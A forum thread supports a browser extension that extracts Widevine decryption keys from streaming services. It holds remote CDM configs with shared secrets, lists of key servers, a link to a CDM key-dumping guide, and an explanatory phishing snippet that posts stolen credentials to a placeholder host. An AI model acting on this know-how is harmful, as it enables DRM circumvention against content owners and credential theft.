[Release] Widevine L3 Guesser Extension-Works in 2024 Firefox/Chrome All OS

[Karn]

@Karn
2.
Clearkey is not Widevine, but a another protection method where the decryption key is directly in the source code.
Thus, encoded keys can be retrieved directly from the EME Logger.
This can be in KID:KEY hex format with only simple string manipulation; no CDM key pair is required.
The Clearkey key acquisition process itself is completed entirely within inject.js.

Thank you for explaining that.

1.
This is not an extension issue, but a Pywidevine (or WKS) issue, so submit the issue to the appropriate Github repository.
Also, since this is only a non-generic KID for demo page, so the same problem will not occur outside of the demo.

I see. So far havent encountered any problems with the conventional WV licences.

[LZAA]

I'm using physical device 'cdm' but can't get the keys from 'https://www.vdocipher.com/blog/2014/12/add-text-to-videos-with-watermark/'.
The server writes: {"code":2083,"message":"Authorization failed or server cache misconfigured"}
Can this be fixed?

[aqzs]

I'm using physical device 'cdm' but can't get the keys from 'https://www.vdocipher.com/blog/2014/12/add-text-to-videos-with-watermark/'.
The server writes: {"code":2083,"message":"Authorization failed or server cache misconfigured"}
Can this be fixed?

You have to use a fresh otp and playbackinfo for every widevine request.

[LZAA]

It seems to me that you do not understand what I am writing about.
I am writing about the work of 'add-on'.

[aqzs]

It seems to me that you do not understand what I am writing about.
I am writing about the work of 'add-on'.

The add-on is not able to get fresh opt and playbackinfo, so will not be able to get the license.

[LZAA]

Are you sure?

https://files.videohelp.com/u/274438/vdo.png

[jack_666]

Can anyone explain this?

Code:

INFO:aiohttp.access:127.0.0.1 [03/Jun/2024:16:30:15 -0500] "HEAD / HTTP/1.1" 200 185 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
INFO:aiohttp.access:127.0.0.1 [03/Jun/2024:16:30:15 -0500] "GET /device.wvd/open HTTP/1.1" 401 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"

Playing around with the remote feature, but unable to get it to work. What is required for this feature to work? Presently I am running a local server and have no idea as to how to connect to a remote server or why I cannot use the local server


I have a list of some remote sites


http://165.22.212.0/
http://108.181.133.95:8080/
https://keysdb.net/— discord login needed to use
https://getwvkeys.cc/— discord verification needed + invite only
https://beta.cdrm-project.com



Can I not use a local server?
http://127.0.0.1:8786




when at http://127.0.0.1:8786 I see ...
{"status": 200, "message": "Pong!"}
Help anyone?

[FoxRefire]

I'm using physical device 'cdm' but can't get the keys from 'https://www.vdocipher.com/blog/2014/12/add-text-to-videos-with-watermark/'.
The server writes: {"code":2083,"message":"Authorization failed or server cache misconfigured"}
Can this be fixed?

Despite the fact that I have confirmed that it works on my side, many users have reported that it does not work with VdoCipher, so I tested it with WindowsVM and were able to reproduce the situation.
On GNU/Linux, it works fine with Physical CDM and License Blocking enabled in the right-click menu.
It seems that this is not a simple problem, as the same thing happened also when I changed the user agent to try it out.
I rarely use Windows so I was not aware of the problem.

[FoxRefire]

Playing around with the remote feature, but unable to get it to work. What is required for this feature to work? Presently I am running a local server and have no idea as to how to connect to a remote server or why I cannot use the local server

Help anyone?

Check lists
- [] Replaced FILENAME, APIKEY, FILENAME, SYSTEMID, and YOURSERVER:PORT in the `serve.yml` and `remote.json`
- [] Checked to see if quoting was required for the replaced location (WRITE QUOTE where quotes are originally present, BUT NOT elsewhere)
- [] FILENAME must not include the file extension


For use with CDRM, use the following remote.json. I added this to documentation.
```
{
"device_type":"ANDROID",
"system_id":4464,
"security_level":3,
"host":"https://cdrm-project.com/devine",
"secret":"CDRM-Project",
"device_name":"CDM"
}
```

[jack_666]

remote config ... unable to get this to work

serve.yml from https://github.com/devine-dl/pywidevine/blob/master/serve.example.yml

Code:

# This data serves as an example configuration file for the `serve` command.
# None of the sensitive data should be re-used.


# List of Widevine Device (.wvd) file paths to use with serve.
# Note: Each individual user needs explicit permission to use a device listed.
devices:
  - 'C:\private\test_device_001.wvd'


# List of User's by Secret Key. The Secret Key must be supplied by the User to use the API.
users:
  fvYBh0C3fRAxlvyJcynD1see3GmNbIiC:  # secret key, a-zA-Z-09{32} is recommended, case-sensitive
    username: jane  # only for internal logging, user will not see this name
    devices:  # list of allowed devices by filename
      - test_device_001
  # ...


# All clients must provide a service certificate for privacy mode.
# If the client does not provide a certificate, privacy mode may or may not be used.
# Enforcing Privacy Mode helps protect the identity of the device and is recommended.
force_privacy_mode: true

Changed the device from test_key_001 to test_device_001 (made no difference)


remote.json

Code:

{
    "device_type":"ANDROID",
    "system_id":4464,
    "security_level":3,
    "host":"http://127.0.0.1:8786",
    "secret":"fvYBh0C3fRAxlvyJcynD1see3GmNbIiC",
    "device_name":"test_device_001"
}

start server

Code:

C:\Python312\python.exe C:\Python312\Scripts\pywidevine.exe serve C:/private/z_wvd_file/serve.yml

Code:

INFO:root:pywidevine version 1.8.0 Copyright (c) 2022-2024 rlaphoenix
INFO:root:https://github.com/devine-dl/pywidevine
======== Running on http://127.0.0.1:8786 ========

ran the remote extension .... numerous times

Code:

INFO:aiohttp.access:127.0.0.1 [03/Jun/2024:23:57:19 -0500] "HEAD / HTTP/1.1" 200 185 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
INFO:aiohttp.access:127.0.0.1 [03/Jun/2024:23:57:19 -0500] "GET /test_device_001/open HTTP/1.1" 200 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
INFO:aiohttp.access:127.0.0.1 [03/Jun/2024:23:57:19 -0500] "POST /test_device_001/get_license_challenge/STREAMING HTTP/1.1" 403 278 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"

and at the browser url


http://127.0.0.1:8786/


{"status": 200, "message": "Pong!"}

Any suggestions.

This checklist is hard to follow. I assume that the first word should be Replace and not Replaced

Check lists Replaced FILENAME, APIKEY, FILENAME, SYSTEMID, and YOURSERVER:PORT in the serve.yml and remote.json


Checked to see if quoting was required for the replaced location (WRITE QUOTE where quotes are originally present, BUT NOT elsewhere)


FILENAME must not include the file extension.


Have no idea what the highlighted text is saying. Sometimes a picture is worth a thousand words.

[Kadio]

Anyway, is there any reason why you dare to use the legacy version?

There is a new version that has more features and also has careful documentation.

Do you mean: the NextGen version (uses Pyodide + Pywidevine) ?

Pywidevine conflicts with my other scripts.

It runs in a sandbox within the browser, so it will not make conflict.
Just use the newer version unless there is a special reason not to.

Why ?
My friend has the same script as me.
A friend installed the NextGen version (he uses Pyodide+ Pywidevine) - the script stopped working.
I remember when I wanted to install another script based on the pywidevine module - I installed it, but the second script stopped working.
Such a philosophy.

Do you mean Virtualbox?

Brother I don't mean to be rude but you are getting yourself confused here - you really should just use the new version of the extension, and stop messing about with the much more complex old version.

Why ?
My friend has the same script as me.
A friend installed the NextGen version (he uses Pyodide+ Pywidevine) - the script stopped working.
I remember when I wanted to install another script based on the pywidevine module - I installed it, but the second script stopped working.
Such a philosophy.

[FoxRefire]

@Kadio
That's because your friend even did something that wasn't in the manual and didn't need to be done.

Or perhaps your PC is running a "wonderful" OS that even reflects locally what you do on online-python.com.

@jack_666
Currently,it omitted setting service cert, so it must be set to "force_privacy_mode: false".

The service cert contains the public key on the license server side and is used to encrypt the challenge generated by CDM.

The force_privacy_mode option is intended to prevent the client side from obtaining metadata contained in the challenge by forcing the service cert setting on the client side.

Therefore, even if this is false, it does not affect privacy on the client side.

Also, you can check the response from the remote CDM for details of errors.

[papa01]

My unfortunate AZP behaves like this.

I have read and executed it, I have root access.
https://github.com/FoxRefire/wvg/wiki/How-to-dump-CDM-key-pair-from-physical-device


Have I understood correctly that the decrypt is to be performed on a device where we have access?
https://github.com/FoxRefire/wvg/wiki/Using-with-Remote-CDM

I haven't improved my English yet, sorry.

[jack_666]

@FoxRefire Thanks.


The extension works for remote mode with the cdm .wvd file stored locally. As Foxrefire pointed out, you needed to use
force_privacy_mode: false


Anyone, wishing to emulate what I did, can use the same .yml and .json files. You may need to change the "system_id":XXXX




Follow the instructions below as to how to get the system ID of your .wvd file


For Windows OS


Execute/Open cmd.exe (no need to open as administrator)


C:\Windows\System32>
C:\Windows\System32>python
>>>
>>> from pywidevine.device import Device
>>>


Now assume that your file name is test_device_001.wvd and is located in c:\private directory, you need to then enter

Code:

Device.load("c:/private/test_device_001.wvd").system_id    


 or


Device.load("c:\\private\\test_device_001.wvd").system_id

This is because python treats \ as an escape character. (FYI : For the .yml file you use - 'C:\private\test_device_001.wvd')


>>> Device.load("c:/private/test_device_001.wvd").system_id
4464

[FoxRefire]

@papa01

My unfortunate AZP behaves like this.

Try setting Linux Firefox useragent using this extension
Also, use Github issues instead for support on Website A, not here.

Have I understood correctly that the decrypt is to be performed on a device where we have access?
https://github.com/FoxRefire/wvg/wiki/Using-with-Remote-CDM

Remote CDM allows CDM processes such as challenge generation and key acquisition to be performed on a remote server.
The CDM Device is located on the remote server.
Requests to the license server are likewise made from the client side, so there is no risk of man-in-the-middle attacks by server operators.
Remote CDM is as secure in terms of security and privacy as local ones.

[FoxRefire]

I have added content to the FAQs in the Documentation.
Please suggest anything else that should be added to Docs.
https://github.com/FoxRefire/wvg/wiki/Troubleshooting-FAQ#is-it-safe-to-use-a-remote-c...-a-third-party

[papa01]

Great, it will only allow SD from L3, is that how it's supposed to be?

In my case I can go even higher, but I haven't found a solution yet.


AMZ P

Kodi addon win11 SD
Kodi addon android HD

[martinez1988]

hey guys
is there any guide to create custom Challenge Scheme for wvg-Next extenstion? needed it for this particular license server: shield-drm.imggaming.com/api/v2/license
thanks in advance

[LittleSoldier]

hey guys
is there any guide to create custom Challenge Scheme for wvg-Next extenstion? needed it for this particular license server: shield-drm.imggaming.com/api/v2/license
thanks in advance

https://github.com/FoxRefire/wvg/wiki/How-to-add-custom-license-scheme-yourself

[FoxRefire]

[Announcement]

I have defined functions in pre.py to make it easier and more intuitive to create schemes.

I also changed CommonWV scheme to use corsFetch instead of pyfetch, which fixes a problem with some licensed servers that did not work despite being CommonWV.

A survey regarding this extension is now open. Please take a moment to fill out the survey.
https://www.formape.com/f/jyvwq

[elbuscavidas]

@zorrorefire Thank you very much, today I tested the extension with the Dazn platform and it works perfectly. very thankful

[papa01]

C+ works, I thought that there would be 3 keys under L3, and there are only 2 keys (540p), so the quality will be bad.

Thank you

[Silv3r]

......

[TPD94]

NextGen version

Install extension
1. Navigate to about:debugging#/runtime/this-firefox
2. Load temporary addon


File C:\Users\Administrator\Downloads\wvg-next\wvg-next.zip does not contain a valid manifest

Am i doing something wrong ?

Extract the folder inside the zip, then use firefox to navigate and open the manifest.json

[Silv3r]

....

[Silv3r]

....

[Silv3r]

NextGen version(Uses Pyodide+Pywidevine):
https://github.com/FoxRefire/wvg/tree/next

Legacy version(Uses WVCore.Server):
https://github.com/FoxRefire/wvg/tree/legacy

Documentation<= Read here first!

Details of poll: #391

This tool is researchment and pentest tool of Widevine, Do not decrypt content with keys obtained using this tool if yo do not own rights of content!

Rules:
1.Bug report without any logs will ignored(Right click-->Inspect-->Console from both Video & Pop-up page)
2.Inclusion request for specific website must be submit HAR(or python scheme file if you can write code)
3.You must Read instruction properly, Use your brain and Do web search before asking for help
4.Don't discuss or ask about decryption after key gathered by this extension here
5.I am not interested in Chrome CDM, don't ask for that. And don't buy Telly scams crap
6.Contribute to OSS. I am not free customer support for you.

Demo sites where you can try out this extension:
https://gist.github.com/FoxRefire/98bf4d339731679e394fa2ed5a9f5561

You can request custom schemes for specific website even if you are coding noob for now!
More info: https://forum.videohelp.com/threads/414140-[Release]-Widevine-L3-Guesser-Extension-Wor...e7#post2733414

Received requests(Red:Rejected Yellow:Accepted Blue:Broken Green:Added):
clarovideo.com
rivertv.ca
shaw.ca
youku.tv
globaltv.com
polsatboxgo.pl
rte.ie

https://github.com/FoxRefire/wvg/tree/next

Firefox 126.0.1

Reading manifest: Warning processing version_name: An unexpected property was found in the WebExtension manifest.

the add-on icon isn't showing in the browser

[jack_666]

@FoxRefire

Thanks for the program updates




Studying/Concerning the corsFetch routine


async def corsFetch(url: str, method: str, headers: [dict, str], body: [dict, bytes, str], resType: str="blob"):




Can you be kind enough to give examples of :




example of headers: [dict] ___________________


example of headers: [str] __________________




example of body: [dict] ___________________


example of body: [bytes] ___________________


example of body: [str] ___________________




example of resType [blob] ___________________



Thanks

[FoxRefire]

First, the ultimate goal of corsFetch is to make the Origin header the original hostname.

Some license servers require that the original Origin header be set, otherwise the license request will be rejected.



[Attachment 79782 - Click to enlarge]
pyfetch



[Attachment 79784 - Click to enlarge]
corsFetch


Web browsers have the concept of "Origin," which indicates the origin of a Javascript code or request.

This Origin header is defined as Forbidden header name ,so it cannot be set freely.

This is to prevent malicious scripts from processing it as another origin that has been spoofed.

For example, consider this case.

Code:

//https://examplephishingpage.com/


<iframe id="anotherOriginFrame" src="https://myexamplebanking.com/login"> //iframe that is another origin

<script>
iframe = document.getElementById('anotherOriginFrame');

dumpedId = iframe.contentWindow.document.userid
dumpedPw = iframe.contentWindow.document.password

// Cracker tries getting information from another origin iframe and tries sending it to remote server
fetch("https://examplephishingpage.com/cracker",{body:`${dumpedId}&${dumpedPw}`,method:"POST"})
</script>

Web browsers(CORS) do not allow this behavior.

And this applies even to extensions. Requests originating from extensions are forced to have the extension's Origin header, and are not allowed to set it as freely as local scripts that outside of web browser's sandbox.

However, anything done from a content script is an exception, and the original origin applies. The processing described here is considered to have been performed from the original Origin.

Okay, so how do we get the information from the Python script being run by Pyodide in the popup script to the content script?

First, calling corsFetch() in Python calls js.corsFetch(), which is defined in Javascript.

At this time, arguments must be stringified once so as not to cause type errors between Python<==>Javascript.

Therefore, the request body is once encoded in Base64.

When js.corsFetch() is called, the popup script uses chrome.tabs.sendMessage() to send a message to the content script.

And then when the content script receives a message, it executes the request at the origin and returns a response.


Does this seem very redundant? I think so too.
But this restriction is very important to protect our security as we browse the web.


PS.
I enjoy answering technical questions, so feel free to ask me anytime.
Also, could you tell your friend to resend Kanopy's HAR? It was withheld because it was inadequate and did not contain information critical to adding the scheme.

[popmar88]

The extension works for me for most of the sites, but in this one case i have the following error

TypeError: tabs[0] is undefined

What could be the issue?


[Attachment 79788 - Click to enlarge]

if i use chrome/edge i gett message "no weidewine content detected while in firefox i get the licence server url + pssh detected